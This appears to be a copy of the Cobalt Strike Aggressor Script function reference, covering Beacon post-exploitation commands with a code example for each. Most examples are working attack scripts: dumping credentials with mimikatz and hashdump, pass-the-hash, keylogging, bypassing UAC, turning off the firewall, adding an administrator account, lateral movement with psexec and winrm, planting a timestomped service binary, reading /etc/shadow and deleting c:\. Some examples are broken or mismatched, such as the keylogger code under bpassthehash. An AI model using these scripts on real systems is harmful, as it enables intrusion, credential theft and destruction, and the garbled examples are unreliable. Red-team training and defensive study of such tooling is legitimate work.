Functions

This is a list of Aggressor Script’s functions 2-3

beacon_remove

Remove a Beacon from the display.

Arguments

$1 - the id for the beacon to remove

beacon_stage_pipe

This function handles the staging process for a bind pipe stager. This is an optional stager for lateral movement. You can stage any x86 payload/listener through this stager. Use &stager_bind_pipe to generate this stager.

Arguments

$1 - the id of the beacon to stage through

$2 - the target host

$3 - the listener name

$4 - the architecture of the payload to stage. x86 is the only option right now.

Example

# step 1. generate our stager
$stager = stager_bind_pipe("my listener");

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");

beacon_stage_tcp

This function handles the staging process for a bind TCP stager. This is the preferred stager for localhost-only staging. You can stage any payload/listener through this stager. Use &stager_bind_tcp to generate this stager.

Arguments

$1 - the id of the beacon to stage through

$2 - reserved; use $null for now.

$3 - the port to stage to

$4 - the listener name

$5 - the architecture of the payload to stage (x86, x64)

Example

# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");

beacons

Get information about all Beacons calling back to this Cobalt Strike team server.

Returns

An array of dictionary objects with information about each beacon.

Example

foreach $beacon (beacons()) { println("Bid: " . $beacon[‘id’] . " is " . $beacon[‘name’]); }

belevate

Ask Beacon to spawn an elevated session with a registered technique.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the exploit to fire

$3 - the listener to target.

Example

foreach $beacon (beacons()) {
   println("Bid: " . $beacon['id'] . " is " . $beacon['name']);
}

See also

&beacon_exploit_describe, &beacon_exploits

belevate_command

Ask Beacon to run a command in a high-integrity context

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the module/command elevator to use

$3 - the command and its arguments.

Example

# disable the firewall
alias shieldsdn {
   belevate_command($1, "uac-token-duplication", "cmd.exe /C netsh advfirewall set allprofiles state off");
}

See also

&beacon_elevator_describe, &beacon_elevator_register, &beacon_elevators

berror

Publish an error message to the Beacon transcript

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias donotrun {
   berror($1, "You should never run this command!");
}

bexecute

Ask Beacon to execute a command [without a shell]. This provides no output to the user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Example

bexecute($1, "notepad.exe");

bexecute_assembly

Spawns a local .NET executable assembly as a Beacon post-exploitation job.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the .NET executable assembly

$3 - parameters to pass to the assembly

Notes

• This command accepts a valid .NET executable and calls its entry point.
• This post-exploitation job inherits Beacon’s thread token.
• Compile your custom .NET programs with a .NET 3.5 compiler for compatibility with systems that don’t have .NET 4.0 and later.

Example

alias myutil {
   bexecute_assembly($1, script_resource("myutil.exe"), "arg1 arg2 \"arg 3\"");
}

bexit

Ask a Beacon to exit.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Die" {
   binput($1, "exit");
   bexit($1);
}   

bgetprivs

Attempts to enable the specified privilege in your Beacon session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - a comma-separated list of privileges to enable. See:

Example

alias debug {
   bgetprivs($1, "SeDebugPriv");
}

bgetsystem

Ask Beacon to attempt to get the SYSTEM token.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "Get &SYSTEM" {
   binput($1, "getsystem");
   bgetsystem($1);
}

bgetuid

Ask Beacon to print the User ID of the current token

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

bgetuid($1);

bhashdump

Ask Beacon to dump local account password hashes. If injecting into a pid that process requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the hashdump dll into.

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process

item "Dump &Hashes" {
   binput($1, "hashdump");
   bhashdump($1);
}

Inject into the specified process)

bhashdump($1, 1234, "x64");

bind

Bind a keyboard shortcut to an Aggressor Script function. This is an alternate to the bind keyword.

Arguments

$1 - the keyboard shortcut

$2 - a callback function. Called when the event happens.

Example

# bind Ctrl+Left and Ctrl+Right to cycle through previous and next tab.

bind("Ctrl+Left", {
   previousTab();
});

bind("Ctrl+Right", {
   nextTab();
});

See also

&unbind

binfo

Get information from a Beacon session’s metadata.

Arguments

$1 - the id for the beacon to pull metadata for

$2 - the key to extract

Returns

A string with the requested information.

Example

println("User is: " . binfo("1234", "user"));
println("PID  is: " . binfo("1234", "pid"));

binject

Ask Beacon to inject a session into a specific process

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to inject the session into

$3 - the listener to target.

$4 - the process architecture (x86 | x64)

Example

binject($1, 1234, "my listener");

binline_execute

Execute a Beacon Object File. This is the same as using the inline-execute command in Beacon.

Arguments

$1 - the id for the Beacon

$2 - the path to the BOF file

$3 - the string argument to pass to the BOF file

Notes

This functions follows the behavior of inline-execute in the Beacon console. The string argument will be zero-terminated, converted to the target encoding, and passed as an argument to the BOF’s go function. To execute a BOF, with more control, use &beacon_inline_execute

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files .

binput

Report a command was run to the Beacon console and logs. Scripts that execute commands for the user (e.g., events, popup menus) should use this function to assure operator attribution of automated actions in Beacon’s logs.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

# indicate the user ran the ls command
binput($1, "ls");

bipconfig

Task a Beacon to list network interfaces.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - callback function with the ipconfig results. Arguments to the callback are: $1 = beacon ID, $2 = results

Example

alias ipconfig {
   bipconfig($1, {
      blog($1, "Network information is:\n $+ $2");
   });
}

bjobkill

Ask Beacon to kill a running post-exploitation job

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the job ID.

Example

bjobkill($1, 0);

bjobs

Ask Beacon to list running post-exploitation jobs.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bjobs($1);

bjump

Ask Beacon to spawn a session on a remote target.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the technique to use

$3 - the remote target

$4 - the listener to spawn

Example

# winrm [target] [listener]
alias winrm {
   bjump($1, "winrm", $2, $3); {
}

See also

&beacon_remote_exploit_describe, &beacon_remote_exploit_register, &beacon_remote_exploits

bkerberos_ccache_use

Ask beacon to inject a UNIX kerberos ccache file into the user’s kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path the ccache file

Example

alias kerberos_ccache_use {
   bkerberos_ccache_use($1, $2);
}

bkerberos_ticket_purge

Ask beacon to purge tickets from the user’s kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias kerberos_ticket_purge {
   bkerberos_ticket_purge($1);
}

bkerberos_ticket_use

Ask beacon to inject a mimikatz kirbi file into the user’s kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path the kirbi file

Example

alias kerberos_ticket_use {
   bkerberos_ticket_use($1, $2);
}

bkeylogger

Injects a keystroke logger into a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the keystroke logger into.

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process
bkeylogger($1;

Inject into the specified process
bkeylogger($1, 1234, "x64");

bkill

Ask Beacon to kill a process

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to kill

Example

bkill($1, 1234);

blink

Ask Beacon to link to a host over a named pipe

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to link to

$3 - [optional] the pipename to use. The default pipename in the Malleable C2 profile is the default otherwise.

Note

Use &beacon_link if you want a script function that will connect or link based on a listener configuration.

Example

blink($1, "DC");

blog

Post a message to WordPress.com (just kidding). Publishes an output message to the Beacon transcript.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias demo {
   blog($1, "I am output for the blog function");
}

blog2

Publishes an output message to the Beacon transcript. This function has an alternate format from &blog

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias demo2 {
   blog2($1, "I am output for the blog2 function");
}

bloginuser

Ask Beacon to create a token from the specified credentials. This is the make_token command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user’s username

$4 - the user’s password

Example

# make a token for a user with an empty password
alias make_token_empty {
   local('$domain $user');
   ($domain, $user) = split("\\\\", $2);]
   bloginuser($1, $domain, $user, "");
}

blogonpasswords

Ask Beacon to dump in-memory credentials with mimikatz. This function requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the logonpasswords command into or $null

$3 - the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process

item "Dump &Passwords" {
   binput($1, "logonpasswords");
   blogonpasswords($1);
}

Inject into the specified process

beacon_command_register(
   "logonpasswords_inject",
   "Inject into a process and dump in-memory credentials with mimikatz",
   "Usage: logonpasswords_inject [pid] [arch]");
 
alias logonpasswords_inject {
   blogonpasswords($1, $2, $3);
}

bls

Task a Beacon to list files

Variations
bls($1, "folder");

Output the results to the Beacon console.

bls($1, "folder", &callback);

Route results to the specified callback function.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to list files for. Use . for the current folder.

$3 - an optional callback function with the ps results. Arguments to the callback are: $1 = beacon ID, $2 = the folder, $3 = results

Example

on beacon_initial {
   bls($1, ".");
}

bmimikatz

Ask Beacon to run a mimikatz command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

$3 - the PID to inject the mimikatz command into or $null

$4 - the architecture of the target PID (x86|x64) or $null

Example

# Usage: coffee [pid] [arch]
alias coffee {
   if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
      bmimikatz($1, "standard::coffee", $2, $3);
   } else {
      bmimikatz($1, "standard::coffee");
   }
}

bmimikatz_small

Use Cobalt Strike’s “smaller” internal build of Mimikatz to execute a mimikatz command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

$3 - the PID to inject the mimikatz command into or $null

$4 - the architecture of the target PID (x86|x64) or $null

Note
This mimikatz build supports:

* kerberos::golden
* lsadump::dcsync
* sekurlsa::logonpasswords
* sekurlsa::pth

All of the other stuff is removed for size. Use &bmimikatz if you want to bring the full ULTIMATE power of mimikatz to bare on some other offense problem.

Example

# Usage: logonpasswords_elevate [pid] [arch]
alias logonpasswords_elevate {
   if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
      bmimikatz_small($1, "!sekurlsa::logonpasswords", $2, $3);
   } else {
      bmimikatz_small($1, "!sekurlsa::logonpasswords");
   }
}

bmkdir

Ask Beacon to make a directory

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to create

Example

bmkdir($1, "you are owned");

bmode

Change the data channel for a DNS Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the data channel (e.g., dns, dns6, or dns-txt)

Example

item "Mode DNS-TXT" {
   binput($1, "mode dns-txt");
   bmode($1, "dns-txt");
}

bmv

Ask Beacon to move a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to move

$3 - the destination

Example

bmv($1, "evil.exe", "\\\\target\\\C$\\evil.exe");

bnet

Run a command from Beacon’s network and host enumeration tool.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to run.

$3 - the target to run this command against or $null

$4 - the parameter to this command (e.g., a group name)

$5 - the PID to inject the network and host enumeration tool into or $null

$6 - the architecture of the target PID (x86|x64) or $null

Notes

• The domain command executes a BOF using inline_execute and will not spawn or inject into a process
• To spawn a temporary process to inject into do not specify the $5 (PID) and $6 (arch) arguments
• To inject into a specific process specify the $5 (PID) and $6 (arch) arguments.

Example

Spawn a temporary process

# ladmins [target]
# find the local admins for a target
alias ladmins {
bnet($1, "localgroup", $2, "administrators");
}

Inject into the specified process

# ladmins [pid] [arch] [target]
# find the local admins for a target
alias ladmins {
bnet($1, "localgroup", $4, "administrators", $2, $3);
}

bnote

Assign a note to the specified Beacon.

Arguments

$1 - the id for the beacon to post to

$2 - the note content

Example

bnote($1, "foo");

bof_extract

This function extracts the executable code from the beacon object file.

Arguments

$1 - A string containing the beacon object file

Example

$handle = openf(script_resource("/object_file"));
$data   = readb($handle, -1);
closef($handle);

return bof_extract($data);

bof_pack

Pack arguments in a way that’s suitable for BOF APIs to unpack.

Arguments

$1 - the id for the Beacon (needed for unicode conversions)

$2 - format string for the packed data

... - one argument per item in our format string

Note

This function packs its arguments into a binary structure for use with &beacon_inline_execute. The format string options here correspond to the BeaconData* C API available to BOF files. This API handles transformations on the data and hints as required by each type it can pack.

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files .

See also

&beacon_inline_execute

bpassthehash

Ask Beacon to create a token that passes the specified hash. This is the pth command in Beacon. It uses mimikatz. This function requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user’s username

$4 - the user’s password hash

$5 - the PID to inject the pth command into or $null

$6 - the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process

item "&Keylogger" {
   binput($1, "keylogger");
   bkeylogger($1);
}

Inject into the specified process

bkeylogger($1, 1234, "x64");

bpause

Ask Beacon to pause its execution. This is a one-off sleep.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - how long the Beacon should pause execution for (milliseconds)

Example

alias pause { bpause($1, int($2)); }

bportscan

Ask Beacon to run its port scanner.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the targets to scan (e.g., 192.168.12.0/24)

$3 - the ports to scan (e.g., 1-1024,6667)

$4 - the discovery method to use (arp|icmp|none)

$5 - the max number of sockets to use (e.g., 1024)

$6 - the PID to inject the port scanner into or $null

$7 - the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024);

Inject into the specified process
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024, 1234, "x64");

bpowerpick

Spawn a process, inject Unmanaged PowerShell, and run the specified command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the cmdlet and arguments

$3 - [optional] if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle.

Example

# get the version of PowerShell available via Unmanaged PowerShell
alias powerver {
   bpowerpick($1, '$PSVersionTable.PSVersion');
}

bpowershell

Ask Beacon to run a PowerShell cmdlet

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the cmdlet and arguments

$3 - [optional] if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle.

Example

# get the version of PowerShell...
alias powerver {
   bpowershell($1, '$PSVersionTable.PSVersion');
}

bpowershell_import

Import a PowerShell script into a Beacon

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the local file to import

Example

# quickly run PowerUp
alias powerup {
   bpowershell_import($1, script_resource("PowerUp.ps1"));
   bpowershell($1, "Invoke-AllChecks");
}

bpowershell_import_clear

Clear the imported PowerShell script from a Beacon session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias powershell-clear {
   bpowershell_import_clear($1);
}

bppid

Set a parent process for Beacon’s child processes

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the parent process ID. Specify 0 to reset to default behavipr.

Notes

• The current session must have rights to access the specified parent process.
• Attempts to spawn post-ex jobs under parent processes in another desktop session may fail. This limitation is due to how Beacon launches its “temporary” processes for post-exploitation jobs and injects code into them.

Example

# getexplorerpid($bid, &callback);
sub getexplorerpid {
   bps($1, lambda({
      local('$pid $name $entry');
      foreach $entry (split("\n", $2)) {
         ($name, $null, $pid) = split("\\s+", $entry);
         if ($name eq "explorer.exe") {
            [$callback: $1, $pid];
         }
      }
   }, $callback => $2));
}

alias prepenv {
   btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
   getexplorerpid($1, {
      bppid($1, $2);
   });
}

bprintscreen

Ask Beacon to take a screenshot via PrintScr method.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the screenshot tool via PrintScr method

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process

item "&Printscreen" {
   binput($1, "printscreen");
   bpintscreen($1);
}

Inject into the specified process
bprintscreen($1, 1234, "x64");

bps

Task a Beacon to list processes

Variations
bps($1);

Output the results to the Beacon console.

bps($1, &callback);

Route results to the specified callback function.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - an optional callback function with the ps results. Arguments to the callback are: $1 = beacon ID, $2 = results

Example

on beacon_initial {
   bps($1);
}

bpsexec

Ask Beacon to spawn a payload on a remote host. This function generates an Artifact Kit executable, copies it to the target, and creates a service to run it. Clean up is included too.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to spawn a payload onto

$3 - the listener to spawn

$4 - the share to copy the executable to

$5 - the architecture of the payload to generate/deliver (x86 or x64)

Example

brev2self();
bloginuser($1, "CORP", "Administrator", "toor");
bpsexec($1, "172.16.48.3", "my listener", "ADMIN\$");

bpsexec_command

Ask Beacon to run a command on a remote host. This function creates a service on the remote host, starts it, and cleans it up.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to run the command on

$3 - the name of the service to create

$4 - the command to run.

Example

# disable the firewall on a remote target
# beacon> shieldsdown [target]
alias shieldsdown {
   bpsexec_command($1, $2, "shieldsdn", "cmd.exe /c netsh advfirewall set allprofiles state off");
}

bpsexec_psh

REMOVED Removed in Cobalt Strike 4.0. Use &bjump with psexec_psh option.

bpsinject

Inject Unmanaged PowerShell into a specific process and run the specified cmdlet.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to inject the session into

$3 - the process architecture (x86 | x64)

$4 - the cmdlet to run

Example

bpsinject($1, 1234, x64, "[System.Diagnostics.Process]::GetCurrentProcess()");

bpwd

Ask Beacon to print its current working directory

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias pwd {
   bpwd($1);
}

breg_query

Ask Beacon to query a key within the registry.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the key

$3 - x86|x64 - which view of the registry to use

Example

alias typedurls {
   breg_query($1, "HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs", "x86");
}

breg_queryv

Ask Beacon to query a value within a registry key.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the key

$3 - the name of the value to query

$4 - x86|x64 - which view of the registry to use

Example

alias winver {
   breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName", "x86");
}

bremote_exec

Ask Beacon to run a command on a remote target.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the remote execute method to use

$3 - the remote target

$4 - the command and arguments to run

Example

# winrm [target] [command+args]
alias winrm-exec {
   bremote_exec($1, "winrm", $2, $3); {
}

See also

&beacon_remote_exec_method_describe, &beacon_remote_exec_method_register, &beacon_remote_exec_methods

brev2self

Ask Beacon to drop its current token. This calls the RevertToSelf() Win32 API.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias rev2self {
   brev2self($1);
}

brm

Ask Beacon to remove a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to remove

Example

# nuke the system
brm($1, "c:\\");

brportfwd

Ask Beacon to setup a reverse port forward.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to on the target

$3 - the host to forward connections to

$4 - the port to forward connections to

Example

brportfwd($1, 80, "192.168.12.88", 80);

brportfwd_local

Ask Beacon to setup a reverse port forward that routes that the current Cobalt Strike client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to on the target

$3 - the host to forward connections to

$4 - the port to forward connections to

Example

brportfwd_local($1, 80, "192.168.12.88", 80);

brportfwd_stop

Ask Beacon to stop a reverse port forward

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port bound on the target

Example

brportfwd_stop($1, 80);

brun

Ask Beacon to run a command

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Note
This capability is a simpler version of the &beacon_execute_job function. The latter function is what &bpowershell and &bshell build on. This is a (slightly) more OPSEC-safe option to run commands and receive output from them.

Example

alias w {
   brun($1, "whoami /all");
}

brunas

Ask Beacon to run a command as another user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user’s username

$4 - the user’s password

$5 - the command to run

Example

brunas($1, "CORP", "Administrator", "toor", "notepad.exe");

brunasadmin

Ask Beacon to run a command in a high-integrity context (bypasses UAC).

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and its arguments.

Notes

This command uses the Token Duplication UAC bypass. This bypass has a few requirements:

• Your user must be a local admin
• If Always Notify is enabled, an existing high integrity process must be running in the current desktop session.

Example

# disable the firewall
brunasadmin($1, "cmd.exe /C netsh advfirewall set allprofiles state off");

brunu

Ask Beacon to run a process under another process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID of the parent process

$3 - the command + arguments to run

Example

brunu($1, 1234, "notepad.exe");

bscreenshot

Ask Beacon to take a screenshot.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 the PID to inject the screenshot tool

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process

item "&Screenshot" {
   binput($1, "screenshot");
   bscreenshot($1);
}

Inject into the specified process
bscreenshot($1, 1234, "x64");

bscreenwatch

Ask Beacon to take periodic screenshots

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the screenshot tool

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process

item "&Screenwatch" {
   binput($1, "screenwatch");
   bscreenwatch($1);
}

Inject into the specified process
bscreenwatch($1, 1234, "x64");

bsetenv

Ask Beacon to set an environment variable

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the environment variable to set

$3 - the value to set the environment variable to (specify $null to unset the variable)

Example

alias tryit {
   bsetenv($1, "foo", "BAR!");
   bshell($1, "echo %foo%");
}

bshell

Ask Beacon to run a command with cmd.exe

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Example

alias adduser {
   bshell($1, "net user $2 B00gyW00gy1234! /ADD");
      bshell($1, "net localgroup \"Administrators\" $2 /ADD");
}

bshinject

Inject shellcode (from a local file) into a specific process

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID of the process to inject into

$3 - the process architecture (x86 | x64)

$4 - the local file with the shellcode

Example

bshinject($1, 1234, "x86", "/path/to/stuff.bin");

bshspawn

Spawn shellcode (from a local file) into another process. This function benefits from Beacon’s configuration to spawn post-exploitation jobs (e.g., spawnto, ppid, etc.)

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process architecture (x86 | x64)

$3 - the local file with the shellcode

Example

bshspawn($1, "x86", "/path/to/stuff.bin");

bsleep

Ask Beacon to change its beaconing interval and jitter factor.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the number of seconds between beacons.

$3 - the jitter factor [0-99]

Example

alias stealthy {
   # sleep for 1 hour with 30% jitter factor
   bsleep($1, 60 * 60, 30);
}

bsocks

Start a SOCKS proxy server associated with a beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to

Example

alias socks1234 {
   bsocks($1, 1234);
}

bsocks_stop

Stop SOCKS proxy servers associated with the specified Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias stopsocks {
   bsocks_stop($1);
}

bspawn

Ask Beacon to spawn a new session

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the listener to target.

$3 - the architecture to spawn a process for (defaults to current beacon arch)

Example

item "&Spawn" {
   openPayloadHelper(lambda({
      binput($bids, "spawn x86 $1");
      bspawn($bids, $1, "x86");
   }, $bids => $1));
}

bspawnas

Ask Beacon to spawn a session as another user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user’s username

$4 - the user’s password

$5 - the listener to spawn

Example

bspawnas($1, "CORP", "Administrator", "toor", "my listener");

bspawnto

Change the default program Beacon spawns to inject capabilities into.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the architecture we’re modifying the spawnto setting for (x86, x64)

$3 - the program to spawn

Notes

The value you specify for spawnto has to work from x86->x86, x86->x64, x64->x86, and x64->x86 contexts. This is tricky. Follow these rules and you’ll be OK:

1. Always specify the full path to the program you want Beacon to spawn for its post-ex jobs.

2. Environment variables (e.g., %windir%) are OK within these paths.

3. Do not specify %windir%\system32 or c:\windows\system32 directly. Always use syswow64 (x86) and sysnative (x64). Beacon will adjust these values to system32 if it’s necessary.

4. For an x86 spawnto value, you must specify an x86 program. For an x64 spawnto value, you must specify an x64 program.

Example

# let's make everything lame.
on beacon_initial {
   binput($1, "prep session with new spawnto values.");
   bspawnto($1, "x86", "%windir%\\syswow64\\notepad.exe");
   bspawnto($1, "x64", "%windir%\\sysnative\\notepad.exe");
}

bspawnu

Ask Beacon to spawn a session under another process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to spawn this session under

$3 - the listener to spawn

Example

bspawnu($1, 1234, "my listener");

bspunnel

Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward)

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the host of the controller

$3 - the port of the controller

$4 - a file with position-independent code to execute in a temporary process.

Example

bspunnel($1, "127.0.0.1", 4444, script_resource("agent.bin"));

bspunnel_local

Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward). Note: this reverse port forward tunnel traverses through the Beacon chain to the team server and, via the team server, out through the requesting Cobalt Strike client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the host of the controller

$3 - the port of the controller

$4 - a file with position-independent code to execute in a temporary process.

Example
bspunnel_local($1, "127.0.0.1", 4444, script_resource("agent.bin"));

bssh

Ask Beacon to spawn an SSH session.

Arguments

$1 - id for the beacon. This may be an array or a single ID.

$2 - IP address or hostname of the target

$3 - port (e.g., 22)

$4 - username

$5 - password

$6 - the PID to inject the SSH client into or $null

$7 - the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
bssh($1, "172.16.20.128", 22, "root", "toor");

Inject into the specified process
bssh($1, "172.16.20.128", 22, "root", "toor", 1234, "x64");

bssh_key

Ask Beacon to spawn an SSH session using the data from a key file. The key file needs to be in the PEM format. If the file is not in the PEM format then make a copy of the file and convert the copy with the following command:

/usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p

Arguments

$1 - id for the beacon. This may be an array or a single ID.

$2 - IP address or hostname of the target

$3 - port (e.g., 22)

$4 - username

$5 - key data (as a string)

$6 - the PID to inject the SSH client into or $null

$7 - the architecture of the target PID (x86|x64) or $null

Example

alias myssh {
   $pid = $2;
   $arch = $3;
   $handle = openf("/path/to/key.pem");
   $keydata = readb($handle, -1);
   closef($handle);
 
   if ($pid >= 0 && ($arch eq "x86" || $arch eq "x64")) {
      bssh_key($1, "172.16.20.128", 22, "root", $keydata, $pid, $arch);
   } else {
      bssh_key($1, "172.16.20.128", 22, "root", $keydata);
   }
};

bstage

REMOVED This function is removed in Cobalt Strike 4.0. Use &beacon_stage_tcp or &beacon_stage_pipe to explicitly stage a payload. Use &beacon_link to link to it.

bsteal_token

Ask Beacon to steal a token from a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to take the token from

Example

alias steal_token {
   bsteal_token($1, int($2));
}

bsudo

Ask Beacon to run a command via sudo (SSH sessions only)

Arguments

$1 - the id for the session. This may be an array or a single ID.

$2 - the password for the current user

$3 - the command and arguments to run

Example

# hashdump [password]
ssh_alias hashdump {
   bsudo($1, $2, "cat /etc/shadow");
}

btask

Report a task acknowledgement for a Beacon. This task acknowledgement will also contribute to the narrative in Cobalt Strike’s Activity Report and Sessions Report.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

$3 - a string with MITRE ATT&CK Tactic IDs. Use a comma and a space to specify multiple IDs in one string.

https://attack.mitre.org

Example

alias foo {
   btask($1, "User tasked beacon to foo", "T1015");
}

btimestomp

Ask Beacon to change the file modified/accessed/created times to match another file.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to update timestamp values for

$3 - the file to grab timestamp values from

Example

alias persist {
   bcd($1, "c:\\windows\\system32");
   bupload($1, script_resource("evil.exe"));
   btimestomp($1, "evil.exe", "cmd.exe");
   bshell($1, 'sc create evil binpath= "c:\\windows\\system32\\evil.exe"');
   bshell($1, 'sc start netsrv');
}

bunlink

Ask Beacon to delink a Beacon its connected to over a TCP socket or named pipe.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target host to unlink (specified as an IP address)

$3 - [optional] the PID of the target session to unlink

Example

bunlink($1, "172.16.48.3");

bupload

Ask a Beacon to upload a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the file to upload

Example

bupload($1, script_resource("evil.exe"));

bupload_raw

Ask a Beacon to upload a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the remote file name of the file

$3 - the raw content of the file

$4 - [optional] the local path to the file (if there is one)

Example

$data = artifact("my listener", "exe");
bupload_raw($1, "\\\\DC\\C$\\foo.exe", $data);

bwdigest

REMOVED Removed in Cobalt Strike 4.0. Use &bmimikatz directly.

bwinrm

